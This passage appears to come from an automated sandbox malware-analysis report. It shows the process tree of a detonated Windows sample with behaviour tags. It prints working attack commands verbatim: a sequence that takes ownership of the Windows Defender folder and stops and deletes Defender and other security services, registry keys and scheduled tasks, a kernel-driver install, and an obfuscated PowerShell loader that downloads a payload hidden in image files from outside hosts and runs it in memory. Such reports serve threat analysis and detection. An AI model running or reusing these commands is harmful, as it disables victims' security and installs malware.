                                                                    PID:2756
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                    11⤵
                                                                      PID:2792
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                      11⤵
                                                                        PID:2728
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc stop ddrver
                                                                        11⤵
                                                                        • Launches sc.exe
                                                                        PID:1748
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc delete ddrver
                                                                        11⤵
                                                                        • Launches sc.exe
                                                                        PID:2612
                                                            • C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:3044
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd.exe /c 67e8f4de3ad1d.vbs
                                                                7⤵
                                                                  PID:1720
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                                                                    8⤵
                                                                      PID:2712
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBi@G8@YQBl@GU@c@Bk@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                        9⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:448
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.boaeepd/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                          10⤵
                                                                          • Blocklisted process makes network request
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2488
                                                                • C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1540
                                                                  • C:\Users\Admin\AppData\Local\Temp\221.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\221.exe"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1768
                                                                    • C:\Windows\system32\cmd.exe
                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3514.tmp\3515.tmp\3516.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
                                                                      8⤵
                                                                        PID:2160
                                                                        • C:\Users\Admin\AppData\Local\Temp\221.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\221.exe" go
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                          PID:1708
                                                                          • C:\Windows\system32\cmd.exe
                                                                            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\35A1.tmp\35A2.tmp\35A3.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
                                                                            10⤵
                                                                            • Drops file in Program Files directory
                                                                            PID:1592
                                                                            • C:\Windows\system32\sc.exe
                                                                              sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                              11⤵
                                                                                PID:2804
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc start ddrver
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:2392
                                                                              • C:\Windows\system32\timeout.exe
                                                                                timeout /t 1
                                                                                11⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:1028
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop ddrver
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:2396
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc start ddrver
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:2200
                                                                              • C:\Windows\system32\takeown.exe
                                                                                takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                11⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                PID:1508
                                                                              • C:\Windows\system32\icacls.exe
                                                                                icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                11⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                PID:2388
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc stop "WinDefend"
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:2848
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc delete "WinDefend"
                                                                                11⤵
                                                                                • Launches sc.exe
                                                                                PID:2824
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                11⤵
                                                                                  PID:2948
                                                                                • C:\Windows\system32\sc.exe
                                                                                  sc stop "MDCoreSvc"
                                                                                  11⤵
                                                                                  • Launches sc.exe
                                                                                  PID:2760
                                                                                • C:\Windows\system32\sc.exe
                                                                                  sc delete "MDCoreSvc"
                                                                                  11⤵
                                                                                  • Launches sc.exe
                                                                                  PID:1924
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                  11⤵
                                                                                    PID:2724
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    sc stop "WdNisSvc"
                                                                                    11⤵
                                                                                    • Launches sc.exe
                                                                                    PID:2276
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    sc delete "WdNisSvc"
                                                                                    11⤵
                                                                                    • Launches sc.exe
                                                                                    PID:1156
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                    11⤵
                                                                                      PID:968
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      sc stop "Sense"
                                                                                      11⤵
                                                                                      • Launches sc.exe
                                                                                      PID:1148
                                                                                    • C:\Windows\system32\sc.exe
                                                                                      sc delete "Sense"
                                                                                      11⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2652
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                      11⤵
                                                                                        PID:2644
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc stop "wscsvc"
                                                                                        11⤵
                                                                                        • Launches sc.exe
                                                                                        PID:2588
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc delete "wscsvc"
                                                                                        11⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3060
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                        11⤵
                                                                                          PID:1668
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc stop "SgrmBroker"
                                                                                          11⤵
                                                                                            PID:2228
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            sc delete "SgrmBroker"
                                                                                            11⤵
                                                                                            • Launches sc.exe
                                                                                            PID:2784
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                            11⤵
                                                                                              PID:2672
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc stop "SecurityHealthService"
                                                                                              11⤵
                                                                                              • Launches sc.exe
                                                                                              PID:2668
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc delete "SecurityHealthService"
                                                                                              11⤵
                                                                                              • Launches sc.exe
                                                                                              PID:1748
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                              11⤵
                                                                                                PID:2612
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop "webthreatdefsvc"
                                                                                                11⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2504
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc delete "webthreatdefsvc"
                                                                                                11⤵
                                                                                                  PID:2032
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                  11⤵
                                                                                                    PID:784
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop "webthreatdefusersvc"
                                                                                                    11⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:688
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc delete "webthreatdefusersvc"
                                                                                                    11⤵
                                                                                                      PID:2660
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                      11⤵
                                                                                                        PID:2692
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc stop "WdNisDrv"
                                                                                                        11⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:2688
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc delete "WdNisDrv"
                                                                                                        11⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:1984
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                        11⤵
                                                                                                          PID:2828
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc stop "WdBoot"
                                                                                                          11⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:2336
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc delete "WdBoot"
                                                                                                          11⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:2084
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                          11⤵
                                                                                                            PID:1252
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc stop "WdFilter"
                                                                                                            11⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1520
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc delete "WdFilter"
                                                                                                            11⤵
                                                                                                              PID:1660
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                              11⤵
                                                                                                                PID:1852
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop "SgrmAgent"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:2584
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc delete "SgrmAgent"
                                                                                                                11⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:1964
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                11⤵
                                                                                                                  PID:1916
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc stop "MsSecWfp"
                                                                                                                  11⤵
                                                                                                                    PID:1388
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc delete "MsSecWfp"
                                                                                                                    11⤵
                                                                                                                      PID:1056
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                      11⤵
                                                                                                                        PID:1084
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop "MsSecFlt"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2040
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc delete "MsSecFlt"
                                                                                                                        11⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:1832
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                        11⤵
                                                                                                                          PID:1992
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc stop "MsSecCore"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2268
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc delete "MsSecCore"
                                                                                                                          11⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2936
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                          11⤵
                                                                                                                            PID:2924
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                            11⤵
                                                                                                                              PID:1920
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                              11⤵
                                                                                                                                PID:2288
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                11⤵
                                                                                                                                  PID:2704
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                  11⤵
                                                                                                                                    PID:1100
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop ddrver
                                                                                                                                    11⤵
                                                                                                                                      PID:2932
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc delete ddrver
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:2296
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            PID:2308
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                                                                                              7⤵
                                                                                                                              • Downloads MZ/PE file
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Modifies system certificate store
                                                                                                                              PID:2596
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2028
                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 2028 -s 36
                                                                                                                                  9⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:948
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:940
                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 940 -s 44
                                                                                                                                  9⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:2472
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1052
                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 1052 -s 36
                                                                                                                                  9⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:880
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • System Location Discovery: System Language Discovery
